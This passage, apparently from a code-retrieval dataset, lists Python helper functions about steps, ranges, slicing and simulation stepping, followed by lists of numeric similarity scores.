is faster since no function call\n if self.noise_scale > 0:\n # Add gaussian noise if specified\n return samples + np.random.normal(0.0, noise_scale, len(samples))\n else:\n # No noise\n return samples \n \"\"\"", "def get_step(self):\n direction = choice([1, -1])\n distance = choice([0, 1, 2, 3, 4])\n step = direction * distance\n return step", "def get_step(self):\n direction = choice([1, -1])\n distance = choice([0, 1, 2, 3, 4])\n step = direction * distance\n return step", "def __call__(self, new_val, previous_val, step):\n\t\treturn", "def get_step(self):\n direction = choice([1,-1])\n direction = choice([0, 1, 2, 3, 4])\n step = direction * distance\n return step", "def get_step(self):\n # decide which direction and how far\n direction = choice([1, -1])\n distance = choice([0, 1, 2, 3, 4])\n step = direction * distance\n return step", "def step(self):\n raise NotImplementedError", "def start(self, step=None):\n\n if step is None:\n while True:\n next_event = self._pop_next_event()\n if next_event:\n 
self.current_time = next_event.datetime\n next_event.call()\n else:\n break\n else:\n # TODO: this is not right...\n while True:\n run_to = self.current_time + step\n while True:\n next_event = self._pop_next_event(run_to)\n if next_event:\n next_event.call()\n else:\n break\n print \"{time} Simulation Finished\".format(time=self.current_time)", "def next_step(self, location, prev_step):\n vox_data = self._interpolator[location]\n\n sampling_points = self._model.sampling_points\n sampling_edges = self._model.sampling_edges\n samples = self._model.evaluate(vox_data)\n\n peak_values, peak_inds = peak_finding_onedge(samples, sampling_edges)\n peak_points = sampling_points[peak_inds]\n peak_points = _robust_peaks(peak_points, peak_values,\n self.min_relative_peak, self.peak_spacing)\n step = _closest_peak(peak_points, prev_step, self.dot_limit)\n return step", "def step_changes(self) -> pd.Series:\n return self._get_deltas().copy()", "def __iter__(self):\n self.__getitem__(self._num_steps - 1)\n return iter(self._previous_values[self.last_index:])", "def __call__(self, start):\r\n return self._iterate(start)", "def step(self):\r\n raise NotImplementedError", "def group_consecutives(vals, step=1):\r\n\trun = []\r\n\tresult = [run]\r\n\texpect = None\r\n\tfor v in vals:\r\n\t\tif (v == expect) or (expect is None):\r\n\t\t\trun.append(v)\r\n\t\telse:\r\n\t\t\trun = [v]\r\n\t\t\tresult.append(run)\r\n\t\texpect = v + step\r\n\treturn result", "def step(self, move):", "def linrange(start, stop=None, step=1):\n if stop is None:\n stop = start\n start = 0\n n = int(round((stop-start) / step))\n return linspace(start, stop, n+1)", "def extend(self, step):\n self.timesteps.extend(step.timesteps)\n self.masks.extend(step.masks)\n self.x.extend(step.x)\n self.y.extend(step.y)\n self.i.extend(step.i)\n self.j.extend(step.j)\n self.end_time = step.end_time\n self.times = np.arange(self.start_time, self.end_time + self.step, self.step)\n self.u = np.concatenate((self.u, step.u))\n self.v = np.concatenate((self.v, step.v))\n for attr in self.attributes.keys():\n if attr in step.attributes.keys():\n self.attributes[attr].extend(step.attributes[attr])", "def step(self, steps):\n self._simulate(endStep=self.currentStep+steps)", "def vbForRange(start, stop, step=1):\n num_repeats = (stop - start) / step\n if num_repeats < 0:\n return\n current = start\n while num_repeats >= 0:\n yield current\n current += step\n num_repeats -= 1", "def _stepped_value(self, val):\n if isinstance(self.valstep, Number):\n val = (self.valmin\n + round((val - self.valmin) / self.valstep) * self.valstep)\n elif self.valstep is not None:\n valstep = np.asanyarray(self.valstep)\n if valstep.ndim != 1:\n raise ValueError(\n f\"valstep must have 1 dimension but has {valstep.ndim}\"\n )\n val = valstep[np.argmin(np.abs(valstep - val))]\n return val", "def slicer(seq, start=None, stop=None, step=None):\n return seq[start:stop:step]", "def getIntersectionsFromStep(self, step=1, valve=1e-3):\n sections = []\n extents = self.IntersectionScale # 截取区间\n levels = np.arange(*extents, step=step) # 每隔 1m 截一次\n for i in range(len(levels)):\n origin_temp = self.centroid.copy()\n origin_temp[0] = origin_temp[0] + levels[i]\n try:\n slice = self.mesh.section(plane_origin=origin_temp, plane_normal=self.nVec)\n # 选取每个截面图中面积最大的子图,实现初步去噪\n if slice is not None:\n slice_2D, to_3D = slice.to_planar()\n slices_splited = slice_2D.split()\n sliceIndex = np.argmax([s.area for s in slices_splited])\n slice_2D = slices_splited[sliceIndex]\n if slice_2D.area > 
valve:\n sections.append(slice_2D.to_3D(to_3D))\n except:\n pass\n \n self.Intersections = sections", "def step(node,path):\n return (node[0]+path[0],node[1]+path[1])", "def steps(self):\n for step in self._get_paged(\"steps\", trailing=True):\n yield self.__get_object(step)\n\n return", "def step(self, state):\n a = super().step(state)\n return np.clip(a, -1, 1)", "def step(self, state):\n a = super().step(state)\n return np.clip(a, -1, 1)", "def frange(self,start,stop,step):\n\n frange_res = []\n \n current_num = start\n while current_num <= stop:\n frange_res.append(current_num)\n current_num = current_num + step\n\n if frange_res[len(frange_res) - 1] < stop:\n frange_res.append(stop)\n\n return frange_res", "def compute_step(X):\n return MOVING_STEP", "def step(self, dt_usec):\n\n # If we have no listeners, don't waste time calculating samples\n # @todo: Maybe calculate self.next_step so that we can add sensors during sim, but only if it turns out to be necessary\n if len(self.step_listeners) == 0:\n return\n \n # If the start of our next sample is greater than 1 (step), skip creating samples for this step\n if self.next_start >= 1.0:\n self.next_start -= 1\n return\n \n samples_per_step = self.sampling_rate * dt_usec / 1000000.\n sample_pct_of_step = 1.0/samples_per_step + 0.00000001 # For lerping -- add a tiny amount to eliminate floating point errors (doesn't affect the sim at this scale)\n\n self.step_lerp_pcts = np.arange(self.next_start, 1.0, sample_pct_of_step)\n\n # Call get_step_samples() (implemented in subclasses) to get the samples and add them to the buffer\n samples = self.create_step_samples(dt_usec) # Format np.array([<sample time>, <sample data 1>, ...])\n\n # Send our data to any attached listeners\n #self.logger.debug(\"Sending samples to {} step listeners\".format(len(self.step_listeners)))\n for step_listener in self.step_listeners:\n step_listener.step_callback(self, samples)\n\n # Update or start pct for the next step\n # @TODO: If we don't add .0000001 (or any tiny number, really) here the number of samples taken will be off by quite a bit at smaller step sizes. 
Probably floating point error....\n #self.next_start = sample_pct_of_step - (1 - self.step_lerp_pcts[-1]) +.0000001 # Works, but moved this to sample_pct_of_step calculation\n self.next_start = sample_pct_of_step - (1 - self.step_lerp_pcts[-1])", "def get_steps(self):\n return self.steps", "def make_slice_inclusive(start, stop=None, step=None):\n if stop is None:\n return start, stop, step\n\n if step is None or step > 0:\n if stop == -1:\n stop = None\n else:\n stop += 1\n else:\n if stop == 0:\n stop = None\n else:\n stop -= 1\n return start, stop, step", "def group_consecutives(vals, step=0.0001):\n run = []\n result = [run]\n expect = 0.\n for v in vals:\n v = round(v,5)\n expect = round(expect,5)\n if (v == expect) or (expect == 0.):\n run.append(v)\n else:\n run = [v]\n result.append(run)\n expect = v + step\n return result", "def interpolate(self, step=1, kind=1):\n vt = Reference.interpolate(self, step)\n if vt is False:\n return False\n # Value sequence\n # starting from the oldest time minus step\n oldi = self.get_time(vt[0] - step)\n # Check if we have enough points to interpolate\n if len(self) - oldi < 5:\n return False\n # If possible, go back one more point, for interpolation safety\n if oldi > 1:\n oldi -= 1\n # Decode values and separate time and value vectors\n dat = self[oldi:]\n# print 'Getting data',self.path,dat,vt\n dat = np.array(dat)\n dat = dat.transpose()\n # Build a linear spline using vt points as knots\n #f=LSQUnivariateSpline(dat[0],dat[1],vt, k=kind)\n # Do a linear fitting\n (slope, const), res, rank, sing, rcond = np.polyfit(\n dat[0], dat[1], kind, full=True)\n # Build a vectorized evaluator\n f = np.vectorize(lambda x: slope * x + const)\n while vt[0] < dat[0][0] and len(vt) > 1:\n vt = vt[1:]\n while vt[-1] > dat[0][-1] and len(vt) > 1:\n vt = vt[:-1]\n if len(vt) <= 1:\n return False\n try:\n # Interpret time series\n out = f(vt)\n except:\n print 'Array.interpolate', self.path, vt, dat\n raise\n # Encode in (t,v) append-able list\n out = np.array([vt, out]).transpose()\n self.summary.commit(out)\n return True" ]
[ "0.65679765", "0.64803994", "0.6422485", "0.64052194", "0.63530135", "0.62748873", "0.62696385", "0.6264165", "0.62514406", "0.6197221", "0.614684", "0.6128096", "0.6093126", "0.60743475", "0.60505", "0.6030288", "0.59912664", "0.597212", "0.5929738", "0.59283173", "0.5926146", "0.59192455", "0.5912632", "0.5909894", "0.58975476", "0.58804953", "0.5865609", "0.5864892", "0.58460045", "0.5828825", "0.58197296", "0.58120394", "0.5801717", "0.571021", "0.5708059", "0.57010025", "0.57009834", "0.56851935", "0.5684159", "0.56653714", "0.5659815", "0.5635104", "0.5633026", "0.5630035", "0.56179696", "0.5593868", "0.5583261", "0.55799663", "0.55732894", "0.55609983", "0.5559755", "0.5547818", "0.554201", "0.55354613", "0.55341744", "0.553211", "0.5528549", "0.55207443", "0.5519006", "0.55133754", "0.55088747", "0.55081207", "0.55047774", "0.54952365", "0.5471753", "0.54712695", "0.54690677", "0.54647857", "0.54615945", "0.5455893", "0.5455893", "0.5438264", "0.54264176", "0.5422898", "0.5418789", "0.5418691", "0.5417632", "0.540907", "0.54072237", "0.5404963", "0.54015595", "0.5401313", "0.5399047", "0.53912765", "0.5382225", "0.5377518", "0.5372248", "0.5363176", "0.5359742", "0.53587353", "0.5355024", "0.53544706", "0.5341583", "0.5341583", "0.532746", "0.5326314", "0.53252864", "0.53149515", "0.5308651", "0.52976984", "0.5290231" ]
0.0
-1
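Editor's note: a minimal, self-contained sketch of the `count` document above. The original is a method that returns an `Iter` wrapper class not shown in this row, so the free-function form and the plain-iterator return value are assumptions made for illustration only.

    import itertools

    def count(start=0, step=1, stop=None):
        # Same logic as the positive document above, minus the unshown
        # Iter wrapper (assumed to be a thin iterable adapter).
        out = itertools.count(start, step)
        if stop is not None:
            out = itertools.takewhile(lambda x: x < stop, out)
        return out

    # Usage check: count from 2 by 3, stopping before 12.
    assert list(count(2, 3, stop=12)) == [2, 5, 8, 11]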
Return a sequence of n evenly spaced numbers from a to b.
def evenly_spaced(self, a: Real, b: Real, n: int) -> Iter:
    return Iter(_evenly_spaced(a, b, n))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def split_by_n( seq, n ):\n while seq:\n yield seq[:n]\n seq = seq[n:]", "def split_by_n(seq, n):\n while seq:\n yield seq[:n]\n seq = seq[n:]", "def genslices(n):\n return product(range(-n, n+1), range(-n, n+1), range(-n, n+1))", "def genslices(n):\n return product(range(-n, n + 1), range(-n, n + 1), range(-n, n + 1))", "def evenly_spaced_BDs_OLD(BDs, n):\n BDs = BDs.iloc[:,0].tolist()\n BD_min = min(BDs)\n BD_max = max(BDs)\n return np.linspace(BD_min, BD_max, n)", "def seq_ints(n, start=0, step=1):\n return list(range(start, start + n*abs(step), step))", "def partitions(n):\n for a in range(2,n//2+1):\n yield a, n-a", "def binaire(x,n):\n a,q = [],0\n \n for i in range(n):\n q = x%2\n x //=2\n a = [q] + a\n \n return(a)", "def calcSpacings(self, n):\n\n first = next = (n) / float(n + 1)\n for i in range(n):\n yield (next, 1 - next)\n next = first - (1 - next)", "def groups_of(seq, n):\n for i in range(0, len(seq), n):\n yield seq[i : (i + n)]", "def takespread(sequence, num):\n length = float(len(sequence))\n for i in range(num):\n yield sequence[int(np.ceil(i * length / num))]", "def split(a, n):\n k, m = divmod(len(a), n)\n ret = [a[i*k+min(i, m):(i+1)*k+min(i+1, m)] for i in range(n)]\n return ret", "def takespread(sequence, num):\n length = float(len(sequence))\n for i in range(num):\n yield sequence[int(ceil(i * length / num))]", "def genslices(n):\n def range_with_none():\n yield None\n yield from range(-n, n+1)\n\n for t in product(range_with_none(), range_with_none(), range_with_none()):\n s = slice(*t)\n if s.step != 0:\n yield s", "def splitevery(s, n):\n\treturn [s[x:x+n] for x in range(0,len(s), n)]", "def farey(n):\n a, b, c, d = 0, 1, 1, n\n #yield a, b\n while (c <= n):\n k = (n + b) // d\n a, b, c, d = c, d, (k*c-a), (k*d-b)\n yield a, b", "def even_split(a, n):\n n = min(n, len(a)) # if less elements in array than chunks to output, change chunks to array length\n k, m = divmod(len(a), n)\n return (a[i * k + min(i, m):(i + 1) * k + min(i + 1, m)] for i in range(n))", "def shingle(iterable, n):\n num_shingles = max(1, len(iterable) - n + 1)\n return [iterable[i:i + n] for i in range(num_shingles)]", "def split(a, n):\n n = min(n, len(a))\n k, m = divmod(len(a), n)\n return [a[i * k + min(i, m) : (i + 1) * k + min(i + 1, m)] for i in range(n)]", "def sum_series(n, a=0, b=1):\n\tseq = []\n\tnth_term = 0\n\t\n\tfor i in range(0,n+1):\n\t\tif i == 0:\n\t\t\tseq.append(a)\n\t\tif i == 1:\n\t\t\tseq.append(b)\n\t\tif i > 1:\n\t\t\tnth_term = seq[-1] + seq[-2]\n\t\t\tseq.append(nth_term)\n\t\n\tprint(seq)\n\tprint(seq[n])\n\treturn(seq[n])", "def take(n, seq):\n seq = iter(seq)\n result = []\n try:\n for i in range(n):\n result.append(next(seq))\n except StopIteration:\n pass\n return result", "def split_range(r, n):\n \n step = int(r / n)\n segments = []\n for i in range(n):\n new_segment = [step * i, step * (i + 1)]\n segments.append(new_segment)\n # correct the gap in the missing index due to the truncated step\n segments[-1][-1] = r\n return segments", "def split_into_n(s, n):\n return [s[k:k + n] for k in range(0, len(s), n)]", "def pairs_upto(n):\n return ((a, b)\n for a in range(1, n)\n for b in range(1, n)\n if a <= b)", "def batches(l, n):\n for i in range(0, l, n):\n yield range(i,min(l,i+n))", "def repeat(seq, n):\n for e in seq:\n for _ in range(n):\n yield e", "def randomSeq(n, a, b):\n \n return [\n Complex(a + np.random.random()*(b-a), a + np.random.random()*(b-a))\n for _ in range(n)\n ]", "def iter_n(sequence: Sequence[T], n: int) -> List[T]:\n\t\n\tfor i in 
range(len(sequence) - (n-1)):\n\t\tyield sequence[i:i+n]", "def seq(n,x=0, y=1):\r\n if n==1:\r\n return x\r\n elif n==2:\r\n return y\r\n else:\r\n return seq(n-1,x,y)+seq(n-2,x,y)", "def plus_table(n):\n return [[(i + j) % n for i in range(n)] for j in range(n)]", "def chunk_it(seq, n):\n\n avg = len(seq) / float(n)\n out = []\n last = 0.0\n while last < len(seq):\n out.append(seq[int(last):int(last + avg)])\n last += avg\n return out", "def a2p(a, N):\n return N + 2 + (a % N) + (a // N) * (N + 1)", "def random_number_generator(a: int, b: int) -> Iterator[int]:\n numbers = [val for val in range(a, b)]\n\n while numbers:\n yield numbers.pop(random.randint(0, len(numbers) - 1))", "def takeNGenerator(seq, n):\n\tindex = 0\n\twhile index + n <= len(seq):\n\t\tyield seq[index:index + n]\n\t\tindex = index + 1", "def evenchunks(l, n):\n if type(l) <> list:\n l = list(l)\n \n import math\n n = int(math.floor(len(l)/float(n))) + 10\n print len(l)\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in xrange(0, len(l), n):\n yield l[i:i+n]", "def linspace(start, stop, n, istart=True, istop=True):\r\n n = n-1\r\n arr = [start + ((stop-start)/n) * i for i in range(n+1)]\r\n return arr", "def iterslices(iterable, n, pad_last=False, pad_value=None):\n current = []\n for a in iterable:\n current.append(a)\n if len(current) == n:\n yield current\n current = []\n if current:\n if pad_last:\n current += [pad_value] * (n-len(current))\n yield current", "def farey(n, a=None, b=None, c=None, d=None):\n pairs = []\n if any(i is None for i in (a, b, c, d)):\n a, b, c, d = 1, n, 1, n-1\n pairs.append((a, b))\n while c <= n:\n k = int((n + b) / d)\n a, b, c, d = c, d, (k*c-a), (k*d-b)\n pairs.append((a, b))\n return pairs", "def just2(n, seq):\n for inner_seq in seq:\n yield tuple(just(n, inner_seq))", "def chunks(alist, n):\n for i in range(0, len(alist), n):\n yield alist[i:i + n]", "def islice(n, m):\n npiece = int(math.ceil(1.0*n/m))\n for i in range(npiece):\n if (i+1)*m > n:\n yield i, i*m, n\n else:\n yield i, i*m, (i+1)*m", "def window(seq, n=2):\n it = iter(seq)\n result = tuple(islice(it, n))\n if len(result) == n:\n yield result\n for elem in it:\n result = result[1:] + (elem,)\n yield result", "def window(seq, n=2):\n it = iter(seq)\n result = tuple(islice(it, n))\n if len(result) == n:\n yield result\n for elem in it:\n result = result[1:] + (elem,)\n yield result", "def makePermutations(n):\n\thalf = n // 2\n\tfull = half * 2\n\tswap = np.random.rand(half) > 0.5\n\tpx = np.arange(n)\n\tpx[:full:2] += swap\n\tpx[1:full:2] -= swap\n\treturn px", "def calculate_ranges(a, b):\n try:\n ranges = list(range(0, a, a//b))\n if ranges[-1] != a:\n ranges.append(a)\n return ranges\n except ValueError:\n return [0, a]", "def fibonacci_series_to(n):\r\n l = [0, 1] \r\n for i in range(n - 1):\r\n l = [*l, l[-1] + l[-2]]\r\n return l[:n]", "def chunks(l, n):\n for i in range(0, n):\n yield l[i::n]", "def chunks(l, n):\r\n for i in xrange(0, len(l), n):\r\n yield l[i+1:i+n+1:2]", "def Split(self, k):\n n = len(self)\n start = range(0, n, ceil(n / k))\n end = list(start[1:]) + [n]\n return [range(first, last) for first, last in zip(start, end)]", "def window(seq, n):\n seq_it = iter(seq)\n result = tuple(it.islice(seq_it, n))\n if len(result) == n:\n yield result \n for elem in seq_it:\n result = result[1:] + (elem,)\n yield result", "def makespread(sequence, num):\n length = float(len(sequence))\n seq = np.array(sequence)\n return seq[np.ceil(np.arange(num) * length / num).astype(int)]", "def chunks(seq, 
n):\n assert len(seq) > n\n avg = len(seq) / float(n)\n out = []\n last = 0\n while round(last) < len(seq):\n out.append(seq[round(last):round(last + avg)])\n last += avg\n return out", "def part_2():\n return itertools.permutations(range(5, 10))", "def evenquerychunks(l, n):\n\n l = list(l)\n \n import math\n n = int(math.floor(len(l)/float(n))) + 1\n print len(l)\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n results = []\n for i in xrange(0, len(l), n):\n results.append( l[i:i+n])\n \n return results", "def just(n, seq):\n it = iter(seq)\n for _ in range(n - 1):\n yield next(it, None)\n yield tuple(it)", "def chunks(l, n):\n lists = []\n for i in range(n):\n list1 = np.arange( i*l/n+1 , (i+1)*l/n+1 )\n lists.append(list1)\n return lists", "def chunks(l, n):\r\n for i in range(0, len(l), n):\r\n yield l[i:i+n]", "def chunks(l, n):\n for i in xrange(0, len(l), n):\n yield l[i:i+n]", "def srange(x1, xDoors, spaces):\n for a in xrange(x1, x1 + xDoors):\n yield a\n for a in xrange(x1 + xDoors + spaces, x1 + spaces + xDoors * 2):\n yield a", "def sliding_window(seq, n=DEFAULT_WINDOW_WIDTH):\n it = iter(seq)\n result = tuple(islice(it, n))\n if len(result) == n:\n yield result \n for elem in it:\n result = result[1:] + (elem,)\n yield result", "def chunk(iterable, n):\n iterable = [e for e in iterable]\n avg_length = int(math.ceil(len(iterable) / n))\n return [iterable[i * avg_length:(i + 1) * avg_length] for i in range(n)]", "def numbers(num):\n r = []\n for i in range(num):\n d = len(r)\n r = [1 if i == 0 or i == d else r[i-1]+r[i] for i in range(d+1)]\n yield r", "def distribute_list(a):\n if isinstance(a, int):\n a = range(a)\n out_idxs = []\n ratio = (0.5*(1 + np.sqrt(5)) - 1)*len(a) # Golden fraction\n idx = -ratio\n while len(out_idxs) < len(a):\n idx += ratio\n idx %= len(a)\n idx_int = int(idx)\n while idx_int in out_idxs:\n idx_int += 1\n idx_int %= len(a)\n out_idxs.append(idx_int)\n out = copy.copy(a)\n try:\n for idx_out, idx_a in enumerate(out_idxs):\n out[idx_out] = a[idx_a]\n except TypeError:\n out = list(copy.copy(a))\n for idx_out, idx_a in enumerate(out_idxs):\n out[idx_out] = a[idx_a]\n\n return out", "def split(a, N):\n\n integ = int(len(a) / N)\n remain = int(len(a) % N)\n\n splitted = [a[i * integ + min(i, remain):(i + 1) * integ +\n min(i + 1, remain)] for i in range(N)]\n\n return splitted", "def pair_stream(n):\n n_str = str(n)\n if len(n_str) % 2 != 0:\n n_str = '0' + n_str\n pairs = textwrap.wrap(n_str, 2)\n digit_pairs = [int(p) for p in pairs]\n return itertools.chain(digit_pairs, itertools.repeat(0))", "def chunks(l, n):\r\n for i in range(0, len(l), n):\r\n yield l[i:i + n]", "def chunks(l, n):\r\n for i in range(0, len(l), n):\r\n yield l[i:i + n]", "def chunks(l, n):\r\n for i in range(0, len(l), n):\r\n yield l[i:i + n]", "def chunks(l, n):\r\n for i in range(0, len(l), n):\r\n yield l[i:i + n]", "def chunks(l, n):\r\n for i in range(0, len(l), n):\r\n yield l[i:i + n]", "def chunks(l, n):\r\n for i in range(0, len(l), n):\r\n yield l[i:i + n]", "def chunks(seq: Sequence[T], n: int) -> Iterator[Sequence[T]]:\n for i in range(0, len(seq), n):\n yield seq[i:i + n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\r\n for i in xrange(0, len(l), n):\r\n yield l[i:i+n]", "def chunks(l, n):\n n = int(n)\n for i in xrange(0, len(l), n):\n yield l[i:i+n]", "def chunks(arr, n):\n for i in range(0, len(arr), n):\n yield arr[i:i + n]", "def chunks(l, n):\n for i in xrange(0, len(l), n):\n yield l[i:i+n]", "def 
compute_sequence(starting_numbers: List[int], n_elems: int) -> int:\n elems = list(reversed(starting_numbers))\n\n for _ in range(len(starting_numbers), n_elems):\n try:\n idx_before = elems.index(elems[0], 1)\n except ValueError:\n elems = [0] + elems\n else:\n elems = [idx_before] + elems\n\n return elems[0]", "def triple_step_simplified(n):\n\ta = 0\n\tb = 0\n\tc = 1\n\tfor i in range(n):\n\t\ttemp = a + b + c\n\t\ta, b, c = b, c, temp\n\treturn temp", "def make_b_array(n):\n array = np.linspace(-3, 3, n)\n for i, x in enumerate(array[1:-1], start=1):\n if abs(x) < 1:\n array[i] = 2\n else:\n array[i] = 0\n array[0] = 0\n array[n-1] = 0\n\n return array", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in xrange(0, len(l), n):\n yield l[i:i + n]", "def n_split(text1: Iterable, n: int) -> list:\n\n return [text1[k:k + n] for k in range(0, len(text1), n)]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i: i+n]", "def chunks(l, n):\n for i in xrange(0, len(l), n):\n yield l[i:i+n]", "def take(n, seq):\n return itertools.islice(seq, n)", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i + n]" ]
[ "0.67545396", "0.67385876", "0.6609418", "0.6586301", "0.6527549", "0.6490447", "0.64674157", "0.6464234", "0.64498013", "0.6438853", "0.6431555", "0.64294153", "0.6413279", "0.63846004", "0.63330746", "0.63312566", "0.6319206", "0.6290663", "0.6289663", "0.62633723", "0.62446594", "0.62296426", "0.6226975", "0.62158066", "0.62067735", "0.6196273", "0.61873305", "0.61803776", "0.6178925", "0.6147991", "0.6137082", "0.61194134", "0.6093666", "0.60886574", "0.6073825", "0.6063465", "0.60597724", "0.6054333", "0.6047532", "0.60453856", "0.6037573", "0.6010199", "0.6010199", "0.6001028", "0.59924465", "0.5986941", "0.5979974", "0.59763634", "0.5971845", "0.5965501", "0.5947776", "0.5947559", "0.5939785", "0.592717", "0.592068", "0.58920205", "0.586579", "0.5865053", "0.58608514", "0.58592176", "0.5857192", "0.5857014", "0.58545965", "0.58545464", "0.585278", "0.5849679", "0.5849679", "0.5849679", "0.5849679", "0.5849679", "0.583961", "0.58365214", "0.58314204", "0.58295274", "0.5827467", "0.58254987", "0.582492", "0.5824357", "0.58201087", "0.58127725", "0.5808044", "0.5808044", "0.5808044", "0.5808044", "0.5808044", "0.5808044", "0.5808044", "0.5808044", "0.5808044", "0.5808044", "0.5808044", "0.58075196", "0.580334", "0.58017546", "0.58003306", "0.5800173", "0.57992315", "0.57992315", "0.57992315", "0.5790815" ]
0.7720257
0
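Editor's note: the document above delegates to a private helper `_evenly_spaced` that this row does not include. Below is a hypothetical reconstruction, under the assumption that it follows numpy.linspace semantics (n points, both endpoints included); the source does not confirm this.

    def _evenly_spaced(a, b, n):
        # Assumed behavior: n points from a to b, endpoints included.
        if n == 1:
            yield a
            return
        step = (b - a) / (n - 1)
        for i in range(n):
            yield a + i * step

    # Usage check (these spacings are exact in binary floating point):
    assert list(_evenly_spaced(0.0, 1.0, 5)) == [0.0, 0.25, 0.5, 0.75, 1.0]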
Convert int to string without using builtin str()
def int_to_string(num):
    if num == 0:
        return '0'  # added guard: the digit loop below never runs for zero
    if num < 0:
        num, is_neg = -num, True
    else:
        is_neg = False
    s = []
    while num > 0:
        s.append(chr(ord('0') + num % 10))
        num //= 10
    return ('-' if is_neg else '') + ''.join(reversed(s))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _int2str(num):\n if num<10:\n return '00%s'%str(num)\n elif 10<=num<100:\n return '0%s'%str(num)\n else:\n return '%s'%str(num)", "def _int_to_string(v):\n \n if not isinstance(v,int):\n raise InstrumentParameterException('Value %s is not an int.' % str(v))\n else:\n return '%i' % v", "def intToString(*args):\n return _libsbml.SBO_intToString(*args)", "def to_str(variable):\n try:\n int(variable)\n return str(variable)\n except ValueError:\n return variable", "def ints_to_string(iterable):\n return ''.join([chr(i) for i in iterable])", "def num2str(num):\n require_type(is_number(num), 'parameter of number->string must be a number')\n return tostr(num)", "def base2str(self, int_number):\r\n return self.format_base % (float(int_number) / self.mult_base)", "def SBO_intToString(*args):\n return _libsbml.SBO_intToString(*args)", "def process_int(integer: int) -> str:\n\n return str(integer) if integer else Presenter.DEFAULT", "def validate_int_to_str(x):\n\n if isinstance(x, int):\n return str(x)\n if isinstance(x, str):\n return str(int(x))\n\n raise TypeError(f\"Value {x} of type {type(x)} must be either int or str\")", "def __rank_from_int_to_str(rank: int) -> str:\n return str(rank + 1)", "def __int__(self):\n return int(str(self),2)", "def int2dec(n: int) -> str:", "def serialize_number(n):\n return str(n)", "def _num2str(self, num):\n q, mod = divmod(num, 10)\n suffix = \"th\" if q == 1 else self.SUFFIX_DICT[mod]\n return f\"{num}{suffix}\"", "def convert_int_to_str(df):", "def transforme(n):\n if n<10 :\n return '0'+str(n)\n else :\n return str(n)", "def issnint2str(issn_int):\n if type(issn_int) is not int:\n raise TypeError(\"issn_int is not int\")\n issn_ = \"{num:07d}\".format(num=issn_int)\n check = map(lambda x: int(x), issn_)\n res = 0\n for pp in zip(check, range(8, 1, -1)):\n res += pp[0] * pp[1]\n\n rem = (11 - res) % 11\n rem = \"X\" if rem == 10 else rem\n issn_str = \"{0}-{1}{2}\".format(issn_[:4], issn_[4:], rem)\n return issn_str", "def int2str(value_int, currency):\r\n if currency in \"BTC LTC NMC\":\r\n return (\"%16.8f\" % (value_int / 100000000.0))\r\n elif currency in \"JPY SEK\":\r\n return (\"%12.3f\" % (value_int / 1000.0))\r\n else:\r\n return (\"%12.5f\" % (value_int / 100000.0))", "def quote2str(self, int_number):\r\n return self.format_quote % (float(int_number) / self.mult_quote)", "def convertInt(s):\n try:\n int(s)\n return \"INT\"\n except:\n return s", "def to_str(n: float) -> str:\n return str(n)", "def _format(self, id_num: int) -> typing.Union[int, str]:\n return id_num", "def int_to_str(number):\n rb = RuleBasedNumberFormat(URBNFRuleSetTag.SPELLOUT, Locale('pl_PL'))\n verbalized = rb.format(int(number))\n return verbalized", "def format_int(self, data):\n return u'%d' % data", "def get_simple_digit_str(a_float_int):\r\n int_value = int(a_float_int)\r\n if int_value == a_float_int:\r\n return str(int_value)\r\n return \"%.3f\" % a_float_int", "def convert(num):\r\n if len(str(num))==1:\r\n return \"000%i\"%num\r\n elif len(str(num)) == 2:\r\n return \"00%i\"%num\r\n elif len(str(num)) == 3:\r\n return \"0%i\"%num\r\n elif len(str(num)) == 4:\r\n return \"%i\"%num", "def convert_to_str(value):\n\tif value is None:\n\t\treturn '-'\n\treturn str(value)", "def internal_id_to_display_id(i_id: int) -> str:\n i_id = str(i_id).zfill(9)\n return ''.join(i_id[x - 1] for x in [1, 5, 9, 6, 3, 8, 2, 4, 7])", "def intRender(self, number):\n\n data = unicode(number)\n bites = list()\n\n while data:\n bites.append(data[-3:])\n data = data[:-3]\n\n return \" 
\".join(reversed(bites))", "def __str__(self):\n if self.is_int():\n return str(self._num)\n else:\n return \"{0:d} / {1:d}\".format(self._num, self._den)", "def decint2binstr(n):\n if n < 0:\n return '-' + decint2binstr(-n)\n s = ''\n while n != 0:\n s = str(n % 2) + s\n n >>= 1\n return s or '0'", "def int2hex(n: int) -> str:", "def int2text(integer):\n # Numbers 1-99 are handled by simply looking up words in the special_case\n # dictionary.\n if integer < 100:\n return digit2text(integer)\n\n elif integer < 1000:\n # If exactly some hundred, then just return the word for the hundred's\n # place and the word 'hundred'\n if integer%100 == 0:\n return digit2text(integer/100)+'hundred'\n # Otherwise return the word for the hundred's place, the word\n # 'hundredand' and do some composition to make the rest of the words.\n else:\n return digit2text(integer/100)+'hundredand'+\\\n digit2text(integer%100)\n # Special case for 1000.\n elif integer == 1000:\n return \"onethousand\"", "def numbers_to_string(nums):\n return \"\".join(chr(n + ord(\"a\")) for n in nums)", "def int_to_hexstr(data: int) -> str:\n return \"%0.2X\" % data", "def _encode_int(source: int) -> bytes:\n return b\"i\" + 